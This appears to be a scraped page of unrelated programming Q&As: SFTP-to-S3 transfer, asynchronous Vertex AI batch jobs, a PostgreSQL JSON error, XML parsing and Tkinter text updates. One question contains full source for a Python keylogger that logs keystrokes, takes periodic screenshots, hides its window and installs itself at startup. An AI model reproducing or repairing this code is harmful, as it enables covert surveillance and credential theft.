I have some file on sftp (named a.csv, b.csv,c.csv) and I want to load that file directly to S3 using python.
I got the below code from Stackoverflow, but the problem is that instead of ftp_priv_key_filename, i am connecting to the sftp using password.
Please suggest me the correct approach. Thanks
import math
import os
from boto.s3.connection import S3Connection
import io
import paramiko
import stat
import time
chunk_size = 12428800
ftp_priv_key_filename = '/path/to/private/key' # this script assume priv use auth
ftp_username = 'user'
ftp_host = '100.10.86.59'
ftp_port = 22
ftp_dir = '/import/TMP'
s3_id = 'abc'
s3_key = 'xyz'
bucket_name = 'efg/mno/pqr'
s3_conn = S3Connection(s3_id, s3_key)
bucket = s3_conn.get_bucket(bucket_name)
pkey = paramiko.RSAKey.from_private_key_file(ftp_priv_key_filename)
transport = paramiko.Transport((ftp_host, ftp_port))
transport.connect(username=ftp_username, pkey=pkey)
ftp_conn = paramiko.SFTPClient.from_transport(transport)
def move_file(filepath):
key_id = filepath.replace(ftp_dir, '').lstrip('/')
key = bucket.get_key(key_id)
ftp_fi = ftp_conn.file(filepath, 'r')
source_size = ftp_fi._get_size()
if key is not None:
# check if we need to replace, check sizes
if source_size == key.size:
print('%s already uploaded' % key_id)
ftp_fi.close()
return
chunk_count = int(math.ceil(source_size / float(chunk_size)))
mp = bucket.initiate_multipart_upload(key_id)
print('%s uploading size: %imb, %i chunks' % (
key_id, math.ceil(source_size/1024/1024), chunk_count))
for i in range(chunk_count):
start = time.time()
chunk = ftp_fi.read(chunk_size)
end = time.time()
seconds = end - start
print('%s read chunk from ftp (%i/%i) %ikbs' % (
key_id, i + 1, chunk_count,
math.ceil((chunk_size / 1024) / seconds)))
fp = io.BytesIO(chunk)
start = time.time()
mp.upload_part_from_file(fp, part_num=i + 1)
end = time.time()
seconds = end - start
print('%s upload chunk to s3 (%i/%i) %ikbs' % (
key_id, i + 1, chunk_count,
math.ceil((chunk_size / 1024) / seconds)))
mp.complete_upload()
ftp_fi.close()
def move_dir(directory):
ftp_conn.chdir(directory)
for filename in ftp_conn.listdir():
filepath = os.path.join(directory, filename)
if stat.S_ISDIR(ftp_conn.stat(filepath).st_mode):
move_dir(filepath)
else:
move_file(filepath)
move_dir(ftp_dir)
You just have to take out the following line :
pkey = paramiko.RSAKey.from_private_key_file(ftp_priv_key_filename)
and modify the ftp connect to the following (basically using the password instead of private key)
transport.connect(username = ftp_username, password = ftp_password)
You can load the selected file from sftp to S3 using python like below.
from ftplib import FTP_TLS
import s3fs
import logging
def lambda_handler(event, context):
s3 = s3fs.S3FileSystem(anon=False)
ftp_url = "100.10.86.59"
ftp_path = "/import/TMP/"
s3Bucket = "efg/mno/pqr"
file_name = "sample.txt"
ftps = FTP_TLS(ftp_url)
ftps.login('<user_name>','<pwd>')
ftps.prot_p()
ftps.cwd(ftp_path)
ftps.retrbinary('RETR ' + file_name, s3.open("{}/{}".format(s3Bucket, file_name), 'wb').write)
Reference - https://github.com/vhvinod/ftp-to-s3/blob/master/ftp-cred-to-s3.py
Related
I am running a Vertex AI batch prediction using the python API.
The function I am using is from the google cloud docs:
def create_batch_prediction_job_dedicated_resources_sample(
key_path,
project: str,
location: str,
model_display_name: str,
job_display_name: str,
gcs_source: Union[str, Sequence[str]],
gcs_destination: str,
machine_type: str = "n1-standard-2",
sync: bool = True,
):
credentials = service_account.Credentials.from_service_account_file(
key_path)
# Initilaize an aiplatfrom object
aiplatform.init(project=project, location=location, credentials=credentials)
# Get a list of Models by Model name
models = aiplatform.Model.list(filter=f'display_name="{model_display_name}"')
model_resource_name = models[0].resource_name
# Get the model
my_model = aiplatform.Model(model_resource_name)
batch_prediction_job = my_model.batch_predict(
job_display_name=job_display_name,
gcs_source=gcs_source,
gcs_destination_prefix=gcs_destination,
machine_type=machine_type,
sync=sync,
)
#batch_prediction_job.wait_for_resource_creation()
batch_prediction_job.wait()
print(batch_prediction_job.display_name)
print(batch_prediction_job.resource_name)
print(batch_prediction_job.state)
return batch_prediction_job
datetime_today = datetime.datetime.now()
model_display_name = 'test_model'
key_path = 'vertex_key.json'
project = 'my_project'
location = 'asia-south1'
job_display_name = 'batch_prediction_' + str(datetime_today)
model_name = '1234'
gcs_source = 'gs://my_bucket/Cleaned_Data/user_item_pairs.jsonl'
gcs_destination = 'gs://my_bucket/prediction'
create_batch_prediction_job_dedicated_resources_sample(key_path,project,location,model_display_name,job_display_name,
gcs_source,gcs_destination)
OUTPUT:
92 current state:
JobState.JOB_STATE_RUNNING
INFO:google.cloud.aiplatform.jobs:BatchPredictionJob projects/my_project/locations/asia-south1/batchPredictionJobs/37737350127597649
The above output is being printed on the terminal over and over after every few seconds.
The issue that I have is that the python program calling this function keeps on running until it is force stopped. I have tried both batch_prediction_job.wait() & batch_prediction_job.wait_for_resource_creation() with the same results.
How do I start a batch_prediction_job without waiting for it to complete and terminating the program just after the job has be created?
I gave you the wrong instruction on the comments, change the parameter sync=False and the function should return just after be executed.
Whether this function call should be synchronous (wait for pipeline run to finish before terminating) or asynchronous (return immediately)
sync=False
def create_batch_prediction_job_dedicated_resources_sample(
# ...
sync: bool = False,
):
UPDATE - Adding more details:
Check here my notebook code where I tested it and its working:
You have to change the sync=False AND remove/comment the following print lines:
#batch_prediction_job.wait()
#print(batch_prediction_job.display_name)
#print(batch_prediction_job.resource_name)
#print(batch_prediction_job.state)
Your code edited:
def create_batch_prediction_job_dedicated_resources_sample(
key_path,
project: str,
location: str,
model_display_name: str,
job_display_name: str,
gcs_source: Union[str, Sequence[str]],
gcs_destination: str,
machine_type: str = "n1-standard-2",
sync: bool = False,
):
credentials = service_account.Credentials.from_service_account_file(key_path)
# Initilaize an aiplatfrom object
aiplatform.init(project=project, location=location, credentials=credentials)
# Get a list of Models by Model name
models = aiplatform.Model.list(filter=f'display_name="{model_display_name}"')
model_resource_name = models[0].resource_name
# Get the model
my_model = aiplatform.Model(model_resource_name)
batch_prediction_job = my_model.batch_predict(
job_display_name=job_display_name,
gcs_source=gcs_source,
gcs_destination_prefix=gcs_destination,
machine_type=machine_type,
sync=sync,
)
return batch_prediction_job
datetime_today = datetime.datetime.now()
model_display_name = 'test_model'
key_path = 'vertex_key.json'
project = '<my_project_name>'
location = 'asia-south1'
job_display_name = 'batch_prediction_' + str(datetime_today)
model_name = '1234'
gcs_source = 'gs://<my_bucket_name>/Cleaned_Data/user_item_pairs.jsonl'
gcs_destination = 'gs://<my_bucket_name>/prediction'
create_batch_prediction_job_dedicated_resources_sample(key_path,
project,location,
model_display_name,
job_display_name,
gcs_source,
gcs_destination,
sync=False,)
Results sync=False:
Results sync=True:
i have a project with django .on the host when i want to upload an image sometime error occurred(problem with specific images)! the below show how i resize uploaded images:
def save_files_to_media(request, is_public=False, klass=None, conversation=None):
from apps.file.models import File
fs = FileSystemStorage()
file_items = {}
for data_item in request.data:
file_match = re.search('^fileToUpload\[(\d+)\]$', data_item)
if file_match and file_match.groups():
item_index = file_match.groups()[0]
if item_index not in file_items:
file_items[item_index] = {}
file_items[item_index]['file_to_upload'] = request.data[data_item]
else:
optimize_match = re.search('^optimizeType\[(\d+)\]$', data_item)
if optimize_match and optimize_match.groups():
item_index = optimize_match.groups()[0]
if item_index not in file_items:
file_items[item_index] = {}
file_items[item_index]['optimize_type'] = request.data[data_item]
files = []
for file_item_key in file_items:
input_file = file_items[file_item_key]['file_to_upload']
# TODO: checking validation. if input_file.name is not exist
optimize_type = file_items[file_item_key].get('optimize_type')
file_uuid = str(uuid4())
if is_public:
orig_filename, file_ext = splitext(basename(input_file.name))
directory_name = join(settings.MEDIA_ROOT, file_uuid)
filename = file_uuid + file_ext
else:
directory_name = join(settings.MEDIA_ROOT, file_uuid)
mkdir(directory_name)
filename = input_file.name
filepath = join(directory_name, filename)
fs.save(filepath, input_file)
is_optimized = False
if optimize_type == 'image':
is_success, filepath = image_optimizer(filepath)
filename = basename(filepath)
is_optimized = is_success
file_obj = File(
orig_name=filename,
uuid=file_uuid,
md5sum=get_md5sum(filepath),
filesize=get_filesize(filepath),
meta=get_meta_info(filepath),
is_optimized=is_optimized,
creator=request.user
)
if is_public:
file_obj.is_public = True
else:
file_obj.klass = klass
file_obj.conversation = conversation
file_obj.save()
files.append(file_obj)
return files
here is the error i got with some images:
unsupported Unicode escape sequence
LINE 1: ..., 'ada90ead20f7994837dced344266cc51', 145216, '', '{"FileTyp...
^
DETAIL: \u0000 cannot be converted to text.
CONTEXT: JSON data, line 1: ...ecTimeDigitized": 506779, "MakerNoteUnknownText":
its funny that in my local but not in host. for more information i must tell you guys my postgreSQL version is 11.3 and host postgreSQl is 9.5.17 . where you think is problem? as error it's seems for postgreSQL. thank you
import os
import glob
import pandas as pd
import xml.etree.ElementTree as ET
def xml_to_csv(path):
xml_list = []
for xml_file in glob.glob(path + '/*.xml'):
tree = ET.parse(xml_file)
root = tree.getroot()
for member in root.findall('object'):
value = (root.find('filename').text,
int(root.find('size')[0].text),
int(root.find('size')[1].text),
member[0].text,
int(member[4][0].text),
int(member[4][1].text),
int(member[4][2].text),
int(member[4][3].text)
)
xml_list.append(value)
column_name = ['filename', 'width', 'height', 'class', 'xmin', 'ymin', 'xmax', 'ymax']
xml_df = pd.DataFrame(xml_list, columns=column_name)
return xml_df
def main():
image_path = os.path.join(os.getcwd(), "/images")
xml_df = xml_to_csv(image_path)
xml_df.to_csv('baby_labels.csv', index=None)
print('Successfully converted xml to csv.')
main()
after successfully running this command and i got baby_labels.csv file , but after opening this file nothing data is written means empty. can u help me out
I am trying to understand what is happening here. I get a warning that cannot find reference 'PumpMessages' in 'pythoncom.py' but pip says Requirement already satisfied: pyHook in c:\python27\lib\site-packages so I assume it is installed correctly.
Any help would be appreciated. I have searched google for several days to no avail. Code seems to start properly creating log file and screencap dir but no data is collected and it exits with code 1.
This is the code:
import pyHook
import pythoncom
from sys import argv
from datetime import *
import os
import threading
import pyscreenshot
import win32console
import win32gui
import winshell
root_dir = os.path.split(os.path.realpath(argv[0]))[0]
log_file = os.path.join(root_dir, "log_file.txt")
caps_dir = os.path.join(root_dir, "screencaps")
name = "keylog"
buffer = ""
pause_period = 2
last_press = datetime.now()
pause_delta = timedelta(seconds=pause_period)
cap_period = 15
log_semaphore = threading.Semaphore()
def log(message):
if len(message) > 0:
log_semaphore.acquire()
with open(log_file, "a")as f:
f.write("{}:\t{}\n".format(datetime.now(), message))
# print "{}:\t{}".format(datetime.now(), message)
log_semaphore.release()
def keypress(event):
global buffer, last_press
if event.Ascii:
char = chr(event.Ascii)
if char == "~":
log(buffer)
log("---PROGRAM ENDED---")
os._exit(1)
pause = datetime.now() - last_press
if pause >= pause_delta:
log(buffer)
buffer = ""
if event.Ascii == 13:
buffer += "<ENTER>"
elif event.Ascii == 8:
buffer += "<BACKSPACE>"
elif event.Ascii == 9:
buffer += "<TAB>"
else:
buffer += char
last_press = datetime.now()
def screenshot():
if not os.path.exists(caps_dir):
os.makedirs(caps_dir)
filename = os.path.join(caps_dir, "screen_" + datetime.now().strftime("%Y_%m_%d_%H_%M_%S") + ".png")
pyscreenshot.grab_to_file(filename)
log("---Screenshot taken: saved to {}---".format(filename))
threading.Timer(cap_period, screenshot).start()
def startup():
if name + ".lnk" not in os.listdir(winshell.startup()):
log("---Adding shortcut to startup folder---")
link_loc = os.path.join(winshell.startup(), name + ".lnk")
sc = winshell.shortcut()
sc.path = os.path.realpath(argv[0])
sc.write(link_loc)
window = win32console.GetConsoleWindow()
win32gui.ShowWindow(window, 0)
hm = pyHook.HookManager()
hm.KeyDown = keypress
hm.HookKeyboard()
keylog = threading.Thread(target=pythoncom.PumpMessages())
log("---PROGRAM STARTED---")
startup()
screenshot()
keylog.start()
I am trying to use the Python Tkinter .config() method to update some message text. I can't get it to work. What might I be doing wrong (see the update_message method):
#!/usr/bin/python
import alsaaudio as aa
import audioop
import Tkinter as tk
import tkFont
import threading
import Queue
# styles
BACKROUND_COLOR = '#000000'
TYPEFACE = 'Unit-Bold'
FONT_SIZE = 50
TEXT_COLOR = '#777777'
TEXTBOX_WIDTH = 400
# text
TITLE = 'listen closely'
SCORE_MESSAGE = 'your score:\n '
END_MESSAGE = 'too loud!\ntry again'
# configuration
DEVICE = 'hw:1' # hardware sound card index
CHANNELS = 1
SAMPLE_RATE = 8000 # Hz // 44100
PERIOD = 256 # Frames // 256
FORMAT = aa.PCM_FORMAT_S8 # Sound format
NOISE_THRESHOLD = 3
class Display(object):
def __init__(self, parent, queue):
self.parent = parent
self.queue = queue
self._geom = '200x200+0+0'
parent.geometry("{0}x{1}+0+0".format(
parent.winfo_screenwidth(), parent.winfo_screenheight()))
parent.overrideredirect(1)
parent.title(TITLE)
parent.configure(background=BACKROUND_COLOR)
parent.displayFont = tkFont.Font(family=TYPEFACE, size=FONT_SIZE)
self.process_queue()
def process_queue(self):
try:
score = self.queue.get(0)
self.print_message(score)
except Queue.Empty:
pass
self.parent.after(100, self.update_queue)
def update_queue(self):
try:
score = self.queue.get(0)
self.update_message(score)
except Queue.Empty:
pass
self.parent.after(100, self.update_queue)
def print_message(self, messageString):
print 'message', messageString
displayString = SCORE_MESSAGE + str(messageString)
self.message = tk.Message(
self.parent, text=displayString, bg=BACKROUND_COLOR,
font=self.parent.displayFont, fg=TEXT_COLOR, width=TEXTBOX_WIDTH, justify="c")
self.message.place(relx=.5, rely=.5, anchor="c")
def update_message(self, messageString):
print 'message', messageString
displayString = SCORE_MESSAGE + str(messageString)
self.message.config(text=displayString)
def setup_audio(queue, stop_event):
data_in = aa.PCM(aa.PCM_CAPTURE, aa.PCM_NONBLOCK, 'hw:1')
data_in.setchannels(2)
data_in.setrate(44100)
data_in.setformat(aa.PCM_FORMAT_S16_LE)
data_in.setperiodsize(256)
while not stop_event.is_set():
# Read data from device
l, data = data_in.read()
if l:
# catch frame error
try:
max_vol = audioop.rms(data, 2)
scaled_vol = max_vol // 4680
print scaled_vol
if scaled_vol <= 3:
# Too quiet, ignore
continue
queue.put(scaled_vol)
except audioop.error, e:
if e.message != "not a whole number of frames":
raise e
def main():
root = tk.Tk()
queue = Queue.Queue()
window = Display(root, queue)
stop_event = threading.Event()
audio_thread = threading.Thread(target=setup_audio,
args=[queue, stop_event])
audio_thread.start()
try:
root.mainloop()
finally:
stop_event.set()
audio_thread.join()
pass
if __name__ == '__main__':
main()
I don't want to be laying down a new message every time I update. If the .config() doesn't work, is there another method to update the text configuration of the message?
I would use string variables, first create your string variable then set it to want you want it to display at the start next make your object and in text put the sting variable then when you want to change the text in the object change the string variable.
self.messaget = StringVar()
self.messaget.set("")
self.message = tk.Message(
self.parent, textvariable=self.messaget, bg=BACKROUND_COLOR,
font=self.parent.displayFont, fg=TEXT_COLOR,
width=TEXTBOX_WIDTH, justify="c").grid()
#note renember to palce the object after you have created it either using
#.grid(row = , column =) or .pack()
#note that it is textvariable instead of text if you put text instead it will run but
#but will show PY_Var instead of the value of the variable
edit
to change the text without recreating the object you do the name of the string variable you have used and .set
self.messaget.set("hi")